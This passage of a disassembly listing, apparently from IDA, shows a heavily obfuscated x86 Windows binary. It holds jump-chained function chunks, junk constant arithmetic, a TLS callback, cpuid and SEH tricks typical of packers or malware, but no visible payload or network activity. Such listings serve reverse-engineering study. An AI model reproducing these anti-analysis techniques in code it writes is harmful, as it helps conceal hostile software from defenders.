; FUNCTION CHUNK AT 0042877C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A73F SIZE 00000019 BYTES
jno sub_42609B
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:byte_427A00, 0
jmp loc_42607F
sub_4247FE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_424816: ; CODE XREF: sub_425BF8+431F�j
jnz loc_427A58
loc_42481C: ; CODE XREF: sub_429E52:loc_42483C�j
; sub_429E52-4928�j ...
jno loc_42ED97
push offset loc_4253C7
jmp nullsub_63
; END OF FUNCTION CHUNK FOR sub_425BF8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_71. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E648
loc_42482D: ; CODE XREF: sub_42E648-3E5F�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_42E648
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427F03
loc_424832: ; CODE XREF: sub_427F03+8�j
jmp sub_42DBF0
; END OF FUNCTION CHUNK FOR sub_427F03
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_424837: ; CODE XREF: sub_42B15E-7377�j
jmp nullsub_132
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_42483C: ; CODE XREF: sub_429E52+B1D�j
jnz loc_42481C
jmp loc_425939
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_424847: ; CODE XREF: sub_425B6E-E21�j
jmp loc_428177
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A181
loc_42484C: ; CODE XREF: sub_42A181-4779�j
jb loc_429930
call sub_426E96
; END OF FUNCTION CHUNK FOR sub_42A181
; START OF FUNCTION CHUNK FOR sub_4276E3
loc_424857: ; CODE XREF: sub_4276E3+A�j
or edi, 8F34BCCAh
add edi, 604A4BE4h
xchg edi, [esp+0]
jmp loc_428080
; END OF FUNCTION CHUNK FOR sub_4276E3
; =============== S U B R O U T I N E =======================================
sub_42486B proc near ; CODE XREF: _0182ofla:00424586�j
; sub_427DA9+168A�p
xchg ecx, [esp+0]
pop ecx
add eax, 54h
mov eax, [eax]
or eax, eax
jmp loc_42A670
sub_42486B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_42487B: ; CODE XREF: sub_42C553:loc_42A67C�j
jz loc_4241A7
jmp loc_428B3F
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
mov ebp, [ebx]
jmp loc_4249D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428336
loc_42488D: ; CODE XREF: sub_428336+3184�j
jnz loc_42CCF9
; END OF FUNCTION CHUNK FOR sub_428336
; START OF FUNCTION CHUNK FOR sub_423057
loc_424893: ; CODE XREF: sub_423057+13�j
jmp loc_42A606
; END OF FUNCTION CHUNK FOR sub_423057
; ---------------------------------------------------------------------------
ror ebp, 13h
xor ecx, 31A4B373h
xchg edi, esi
jge loc_4275B1
jmp loc_42CCF3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AA3
loc_4248AE: ; CODE XREF: sub_429AA3:loc_42D709�j
jb sub_42A995
add esp, 0FFFFFFF4h
mov [ebp+var_8], eax
call sub_429ED3
push edi
push 345FEF21h
jmp loc_425D5E
; END OF FUNCTION CHUNK FOR sub_429AA3
; ---------------------------------------------------------------------------
loc_4248CA: ; DATA XREF: sub_428A5F+18�o
mov edx, 0DE6CF580h
push ebx
push 1C76D3F1h
pop ebx
jmp loc_428814
; ---------------------------------------------------------------------------
loc_4248DB: ; CODE XREF: _0182ofla:00428608�j
jns loc_42437E
sub edi, ebx
; START OF FUNCTION CHUNK FOR sub_42662C
loc_4248E3: ; CODE XREF: sub_42662C:loc_4285EE�j
add edi, 0A142929Ah
xchg edi, [esp+10h+var_10]
jmp sub_42D71D
; END OF FUNCTION CHUNK FOR sub_42662C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_4248F3: ; CODE XREF: _0182ofla:loc_4235EA�j
; sub_425DA5+1845�j
jmp loc_42DA3D
; END OF FUNCTION CHUNK FOR sub_425DA5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_196. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4276BF
loc_4248F9: ; CODE XREF: sub_4276BF:loc_426D0D�j
mov eax, ds:dword_423190
mov edx, [ebp-4]
mov byte ptr [eax+edx], 0
inc dword ptr [ebp-4]
cmp dword ptr [ebp-4], 100h
jnz loc_426D0D
jmp loc_429966
; END OF FUNCTION CHUNK FOR sub_4276BF
; ---------------------------------------------------------------------------
mov [ebp-10h], eax
cmp dword ptr [ebp-10h], 0
jz loc_42A7D0
lea eax, [ebp-24h]
jmp loc_42AA90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42492F: ; CODE XREF: sub_4298DD:loc_426CA2�j
jz loc_42C9BF
jmp loc_429370
; END OF FUNCTION CHUNK FOR sub_4298DD
; =============== S U B R O U T I N E =======================================
sub_42493A proc near ; CODE XREF: sub_429B69-5FD5�j
; FUNCTION CHUNK AT 004272EE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042A622 SIZE 0000000B BYTES
push ebp
jmp loc_42A622
sub_42493A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_424940: ; CODE XREF: sub_4231F3:loc_426595�j
sbb edx, ebx
shr ecx, 18h
jmp loc_427DD1
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
loc_42494A: ; CODE XREF: _0182ofla:0042D506�j
xor ebx, 0B79761FEh
; =============== S U B R O U T I N E =======================================
sub_424950 proc near ; CODE XREF: sub_42ADE3+6�p
; FUNCTION CHUNK AT 0042A6C2 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
add eax, 3AAD4A6Fh
push eax
mov eax, [ebp-4]
push eax
jmp loc_42A6C2
sub_424950 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_424964: ; CODE XREF: sub_425B6E+70AC�j
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
jmp loc_428BC4
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_424971: ; CODE XREF: sub_42C553:loc_42CA7D�j
pop ecx
or ecx, 0A8E9ED10h
jnz loc_42DDD9
mov edx, ebp
jmp loc_42DDCF
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_424985: ; CODE XREF: sub_42B669-527�j
mov al, [ecx]
add ecx, 9Ch
add [ecx], al
add ecx, 4
mov dword ptr [ecx], offset loc_4279EE
jmp loc_42CEC6
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4249A0: ; CODE XREF: sub_42798F+1697�j
jnz loc_4244E9
jmp loc_429AF9
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
test ebx, eax
; START OF FUNCTION CHUNK FOR sub_42537E
loc_4249AD: ; CODE XREF: sub_42537E:loc_42EC48�j
jmp loc_42958F
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
test al, al
jz loc_426758
jmp loc_426B7E
; ---------------------------------------------------------------------------
mov edx, 7DA6ACC0h
push offset sub_425A1D
jmp locret_42B7BA
; ---------------------------------------------------------------------------
loc_4249CE: ; CODE XREF: _0182ofla:004238EE�j
and ebp, edi
jmp loc_426504
; ---------------------------------------------------------------------------
loc_4249D5: ; CODE XREF: _0182ofla:00424888�j
adc esi, 0F5F8926Bh
; =============== S U B R O U T I N E =======================================
sub_4249DB proc near ; CODE XREF: _0182ofla:00425B47�p
mov [esp+0], edi
pop edi
mov eax, [ebp-4]
add eax, 3Ch
call sub_42EB7D
sub_4249DB endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42968B
loc_4249EA: ; CODE XREF: sub_42968B-888�j
jmp loc_425169
; END OF FUNCTION CHUNK FOR sub_42968B
; =============== S U B R O U T I N E =======================================
sub_4249EF proc near ; CODE XREF: sub_424B86+11�p
; _0182ofla:004253BB�j
xchg eax, [esp+0]
pop eax
loc_4249F3: ; CODE XREF: _0182ofla:loc_4236FE�j
mov ds:dword_426FB8, eax
retn
sub_4249EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4249FA proc near ; CODE XREF: sub_427239�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004235B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004245CA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004254F7 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00425512 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425F81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429B29 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00429C74 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042AA2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C1E0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042CE9C SIZE 00000008 BYTES
push ebp
mov ebp, esp
jmp loc_4245CA
sub_4249FA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424A02: ; CODE XREF: sub_42798F+4E31�j
jns loc_42ED5A
loc_424A08: ; CODE XREF: sub_42798F:loc_429D0B�j
mov ecx, [ebp-18h]
and ecx, 7
mov eax, 1
jmp loc_424BA1
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_424A18: ; CODE XREF: _0182ofla:loc_42AA81�j
jge loc_426061
jmp loc_42D290
; ---------------------------------------------------------------------------
loc_424A23: ; CODE XREF: _0182ofla:loc_42681C�j
call sub_428D17
mov edx, 0CE3062ECh
call sub_42D71D
call sub_428D17
push 4F484E23h
pop edx
xor edx, 0DDF2048h
sub edx, ds:4000FAh
jmp loc_428AC4
; ---------------------------------------------------------------------------
mov esi, 4ABFFF19h
jmp loc_42AAF6
; ---------------------------------------------------------------------------
not esi
jmp sub_42AA62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_424A5F: ; CODE XREF: sub_4231F3+19�j
mov ecx, [ebx+edx-8]
or ecx, ecx
jz loc_42D510
call sub_4268FC
; END OF FUNCTION CHUNK FOR sub_4231F3
; =============== S U B R O U T I N E =======================================
sub_424A70 proc near ; CODE XREF: sub_429AA3-3D33�p
; FUNCTION CHUNK AT 004257C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004257D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004267BD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427EFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A98D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E8FB SIZE 0000001A BYTES
mov [esp+0], ebp
lea eax, [ebp-4]
call sub_42A3E4
pop ecx
push 0EDA5372Bh
pop eax
sub eax, 0B3812873h
jmp loc_4257C4
sub_424A70 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424A8D: ; CODE XREF: _0182ofla:00423339�j
ror edi, 10h
jmp loc_4288FD
; ---------------------------------------------------------------------------
xor ecx, 0BCE59234h
jmp sub_427906
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_424AA0: ; CODE XREF: _0182ofla:00425A51�j
; sub_4282B8:loc_429926�j
add ebx, 4140241Ah
sub ebx, 6E04EF5h
jnb loc_42CB9A
add edx, 0C5513B61h
jnp loc_428B4A
push 5B149731h
jmp loc_42CB99
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
loc_424AC8: ; CODE XREF: _0182ofla:004264AD�j
add ebx, 5B91BCA2h
popf
xchg ebx, [esp]
jmp loc_42D218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A6D5
loc_424AD7: ; CODE XREF: sub_42A6D5+C�j
pushf
jmp loc_4278EA
; END OF FUNCTION CHUNK FOR sub_42A6D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4292E1
loc_424ADD: ; CODE XREF: sub_4292E1+F�j
push 0FFFFFFFFh
push offset sub_423BD5
jmp loc_42EC67
; END OF FUNCTION CHUNK FOR sub_4292E1
; ---------------------------------------------------------------------------
loc_424AE9: ; DATA XREF: sub_427750+8�o
mov edx, 0CB39536Bh
push offset sub_42583B
; START OF FUNCTION CHUNK FOR sub_42583B
loc_424AF3: ; CODE XREF: sub_42583B:loc_428E35�j
jmp nullsub_218
; END OF FUNCTION CHUNK FOR sub_42583B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_424AF8: ; CODE XREF: TlsCallback_0+391E�j
jz loc_4295BD
pushf
jmp loc_425437
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_424B04: ; CODE XREF: sub_423A2A:loc_426F91�j
cmp ds:dword_427A24, 0
jnz loc_42806F
call sub_426455
mov edx, 0E5254649h
push offset loc_423E32
jmp nullsub_113
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD86
loc_424B25: ; CODE XREF: sub_42DD86+E�j
or eax, eax
jnz loc_42DB9C
jmp loc_42AA29
; END OF FUNCTION CHUNK FOR sub_42DD86
; ---------------------------------------------------------------------------
loc_424B32: ; CODE XREF: _0182ofla:loc_4242DD�j
mov [esp], eax
call sub_42D9A4
loc_424B3A: ; CODE XREF: _0182ofla:loc_42CCF3�j
mov al, 1
pop edx
call edx
xor eax, eax
jmp loc_42830E
; ---------------------------------------------------------------------------
locret_424B46: ; CODE XREF: _0182ofla:loc_42A2D5�j
retn
; ---------------------------------------------------------------------------
loc_424B47: ; CODE XREF: _0182ofla:0042E8B8�j
jmp locret_4275EF
; ---------------------------------------------------------------------------
loc_424B4C: ; CODE XREF: _0182ofla:loc_424BF0�j
push ebx
push edx
push edi
mov [esp], eax
jmp loc_426F6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424B57: ; CODE XREF: sub_42798F+3C1E�j
; sub_42798F+6DA0�j
and ecx, 0F7EBCBE5h
add ecx, 1F8125ECh
mov ecx, [ecx]
movzx edx, byte ptr [ecx+edx]
and eax, edx
jmp loc_42EC8D
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_424B70 proc near ; CODE XREF: sub_423A2A+4F51�p
; FUNCTION CHUNK AT 004236C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042835F SIZE 0000000E BYTES
mov [esp+0], eax
pop eax
cmp dword ptr [ebp-0Ch], 5
jnz loc_428363
mov eax, [ebp+8]
jmp loc_4236C5
sub_424B70 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424B86 proc near ; DATA XREF: _0182ofla:0042547B�o
var_4 = dword ptr -4
mov edx, 0C90D1845h
call sub_42D71D
pushf
mov [esp+4+var_4], eax
ror eax, 1Ch
call sub_4249EF
sub_424B86 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E218
loc_424B9C: ; CODE XREF: sub_42E218-8B88�j
jmp sub_428D09
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424BA1: ; CODE XREF: sub_42798F-2F7C�j
shl eax, cl
mov edx, [ebp-18h]
shr edx, 3
mov ecx, ds:dword_423190
jmp loc_424BFC
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_424BB4: ; CODE XREF: _0182ofla:0042AED7�j
sub ebx, 83FCFED6h
mov eax, 21557C6Fh
pop eax
pop edx
loc_424BC1: ; CODE XREF: _0182ofla:loc_42CDE5�j
pop ebx
mov ecx, offset loc_429BD3
xchg ecx, [esp]
retn
; =============== S U B R O U T I N E =======================================
sub_424BCB proc near ; CODE XREF: sub_42AE82+3�j
; FUNCTION CHUNK AT 00423F19 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426B31 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428793 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AA18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DBCD SIZE 0000000B BYTES
add esp, 0FFFFFD38h
lea eax, [ebp-0Ch]
push eax
mov eax, [ebp+8]
jmp loc_428793
sub_424BCB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_424BDD: ; CODE XREF: sub_42461C+3�j
push ecx
mov esp, ebp
xchg esi, [esp+0]
mov ebp, esi
jmp loc_42ED1A
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
dw 0FFCh
dword_424BEC dd 0 ; DATA XREF: sub_4295D6:loc_427290�w
; sub_42860D+6�w ...
; ---------------------------------------------------------------------------
loc_424BF0: ; CODE XREF: _0182ofla:loc_4284D7�j
jmp loc_424B4C
; ---------------------------------------------------------------------------
db 0A0h, 2Fh, 0C3h
dword_424BF8 dd 86951DF9h ; DATA XREF: _0182ofla:004292FD�w
; sub_42E13B+3�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424BFC: ; CODE XREF: sub_42798F-2DE0�j
jmp loc_429DED
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
db 0A7h, 54h, 17h
dword_424C04 dd 6EEFCE0Dh ; DATA XREF: sub_42E1F0-AC88�w
; sub_427CDE+9�r
; ---------------------------------------------------------------------------
loc_424C08: ; CODE XREF: _0182ofla:004270EE�j
jmp locret_42E06F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424C0D: ; CODE XREF: sub_42798F-2B3D�j
jmp loc_4243C6
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_424C12: ; CODE XREF: _0182ofla:004234E5�j
jmp loc_429DB6
; ---------------------------------------------------------------------------
db 0F2h
dword_424C18 dd 78EFA8B9h ; DATA XREF: sub_42E218:loc_424DA2�r
; sub_42C58A:loc_424F1A�w ...
dword_424C1C dd 6AFEh ; DATA XREF: _0182ofla:004265CC�r
; _0182ofla:loc_4292A6�w ...
dword_424C20 dd 0BA8D3BF3h ; DATA XREF: sub_42326C+9838�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4276BF
loc_424C24: ; CODE XREF: sub_4276BF:loc_42A1AB�j
xchg ebp, [esp+0]
mov ecx, ebp
pop ebp
pop ebp
jmp loc_423107
; END OF FUNCTION CHUNK FOR sub_4276BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_424C30: ; CODE XREF: sub_4298DD:loc_4285E9�j
jnz loc_42676A
jmp loc_42B193
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
loc_424C3B: ; CODE XREF: _0182ofla:loc_42555D�j
push ecx
jmp loc_426718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DE3A
loc_424C41: ; CODE XREF: sub_42DE3A:loc_42C78A�j
jnz loc_42E34C
jmp loc_428E1E
; END OF FUNCTION CHUNK FOR sub_42DE3A
; ---------------------------------------------------------------------------
loc_424C4C: ; CODE XREF: _0182ofla:0042B6E6�j
pushf
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_424C4D: ; CODE XREF: sub_42B15E:loc_42B6D5�j
add edx, 4973992Eh
or eax, edx
pop edx
jmp loc_423823
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
loc_424C5B: ; CODE XREF: _0182ofla:00424337�j
jl loc_42D0AD
; =============== S U B R O U T I N E =======================================
sub_424C61 proc near ; CODE XREF: sub_42798F-DF0�p
; FUNCTION CHUNK AT 004257BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428C3D SIZE 00000011 BYTES
mov [esp+0], esi
pop esi
jnz loc_428C3D
call sub_42705A
loc_424C70: ; CODE XREF: sub_42798F:loc_42DF5C�j
jmp nullsub_16
sub_424C61 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4255E9
loc_424C75: ; CODE XREF: sub_4255E9+5EEF�j
jmp loc_42D5D6
; END OF FUNCTION CHUNK FOR sub_4255E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DFA
loc_424C7A: ; CODE XREF: sub_427DFA-17D3�j
jmp loc_42E5D3
; END OF FUNCTION CHUNK FOR sub_427DFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C1A
loc_424C7F: ; CODE XREF: sub_429C1A-3A38�j
jmp loc_42E10D
; END OF FUNCTION CHUNK FOR sub_429C1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_424C84: ; CODE XREF: sub_423A2A+49EE�j
; sub_423A2A:loc_428E7C�j
call nullsub_4
retn
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_424C8A: ; CODE XREF: sub_4253DC+40C3�j
jmp nullsub_211
; END OF FUNCTION CHUNK FOR sub_4253DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_424C90: ; CODE XREF: sub_423A2A-9DE�j
; sub_423A2A+49BA�j
call sub_423FCD
test al, al
jz loc_427128
call nullsub_5
retn
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB27
loc_424CA3: ; CODE XREF: sub_42AB27-493�j
jmp loc_426D82
; END OF FUNCTION CHUNK FOR sub_42AB27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_424CA8: ; CODE XREF: sub_425629-155B�j
rol edi, 8
push ebx
adc edx, 0EBC9DAB7h
test ecx, 0C69FFDDBh
jmp loc_425EF6
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_424CBD: ; CODE XREF: sub_428041+3�j
add edx, eax
call sub_42B553
loc_424CC4: ; CODE XREF: _0182ofla:00427579�j
push edx
loc_424CC5: ; CODE XREF: sub_425B6E+19EF�j
add eax, 0FFB4743Eh
add eax, ebp
add eax, 858D997Fh
jmp loc_423CB8
; END OF FUNCTION CHUNK FOR sub_428041
; =============== S U B R O U T I N E =======================================
sub_424CD8 proc near ; CODE XREF: sub_427CDE-4757�p
; sub_423716�p ...
; FUNCTION CHUNK AT 0042880F SIZE 00000005 BYTES
push ebp
push offset loc_4297A5
jmp loc_42880F
sub_424CD8 endp
; ---------------------------------------------------------------------------
popf
; =============== S U B R O U T I N E =======================================
sub_424CE4 proc near ; CODE XREF: sub_42660C:loc_427378�p
mov [esp+0], ebx
pop ebx
mov edx, 0CB804A30h
push offset loc_42C23F
jmp nullsub_17
sub_424CE4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_424CF7: ; CODE XREF: sub_424184+27A1�j
sbb esi, 6538E855h
jmp loc_42E3CB
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D03E
loc_424D02: ; CODE XREF: sub_42D03E:loc_428B7E�j
push ecx
mov esp, ebp
xchg ebx, [esp+0]
mov ebp, ebx
and ebx, 7932BBEFh
jmp loc_426D77
; END OF FUNCTION CHUNK FOR sub_42D03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_424D15: ; CODE XREF: sub_4253F4+41D1�j
add ecx, 4
mov dword ptr [ecx], offset loc_425EFC
xor eax, eax
pop ecx
jmp nullsub_189
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
loc_424D29: ; CODE XREF: _0182ofla:loc_428D98�j
adc esi, ebp
shl edx, 13h
jmp loc_4292B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_424D33: ; CODE XREF: sub_425B6E+13E5�j
jle loc_428558
loc_424D39: ; CODE XREF: sub_42A181:loc_427730�j
pop large dword ptr fs:0
add esp, 4
mov eax, 51h
call sub_4265C0
jmp loc_424847
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_424D52: ; CODE XREF: sub_42349B:loc_423AA4�j
pop edi
mov eax, [eax]
mov ecx, 3FDh
call sub_426046
loc_424D5F: ; CODE XREF: _0182ofla:004233DF�j
jmp loc_4284DC
; END OF FUNCTION CHUNK FOR sub_42349B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_424D64: ; CODE XREF: sub_427239+6�j
xchg ebp, esi
push 5658AC10h
mov [esp+8+var_8], esi
xchg ebp, esi
mov ebp, esp
jmp loc_4245D8
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_424D77: ; CODE XREF: sub_429E52:loc_429583�j
ror eax, 0Dh
push ebx
push 402E46FFh
mov ebx, offset sub_42E785
call sub_42E77D
loc_424D8A: ; CODE XREF: sub_42D6DD-973D�j
jmp nullsub_72
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
locret_424D8F: ; CODE XREF: _0182ofla:0042B539�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_424D90: ; CODE XREF: sub_42C1B2:loc_425681�j
mov ebx, ebp
jmp loc_42443D
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_424D97: ; CODE XREF: sub_4291BA-1115�j
jl loc_42985F
jmp loc_427611
; END OF FUNCTION CHUNK FOR sub_4291BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_424DA2: ; CODE XREF: sub_42E218:loc_425CE7�j
mov eax, ds:dword_424C18
or eax, eax
jnz loc_424F26
jmp loc_427F19
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
xor ebx, 8B227211h
cmp ecx, edi
jmp loc_42D86F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_424DC2: ; CODE XREF: sub_428F20-968�j
ja loc_4246A6
jmp loc_429811
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_424DCD: ; CODE XREF: sub_42D056:loc_424042�j
jz loc_42D419
jmp loc_42C98A
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A092
loc_424DD8: ; CODE XREF: sub_42A092+A�j
rol eax, 14h
push eax
retn
; END OF FUNCTION CHUNK FOR sub_42A092
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_424DDD: ; CODE XREF: sub_4267F8+BE6�j
jmp loc_424DEF
; END OF FUNCTION CHUNK FOR sub_4267F8
; =============== S U B R O U T I N E =======================================
sub_424DE2 proc near ; CODE XREF: sub_42D70E+3�p
; FUNCTION CHUNK AT 0042AE5A SIZE 00000005 BYTES
push edx
mov edx, ebp
push offset loc_429983
jmp loc_42AE5A
sub_424DE2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_424DEF: ; CODE XREF: sub_4267F8:loc_424DDD�j
xor eax, eax
mov al, [ebp-9]
shl eax, cl
mov cl, [ebp-0Bh]
xor edx, edx
jmp loc_4238B6
; END OF FUNCTION CHUNK FOR sub_4267F8
; =============== S U B R O U T I N E =======================================
sub_424E00 proc near ; DATA XREF: sub_427DA9+258F�o
mov eax, 50h
sub_424E00 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424707
loc_424E05: ; CODE XREF: sub_424707+540B�j
push eax
push 6031640Fh
pop eax
jmp loc_42D08C
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_424E11: ; CODE XREF: sub_429E52-3D13�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
xor eax, eax
add ecx, 4
mov [ecx], eax
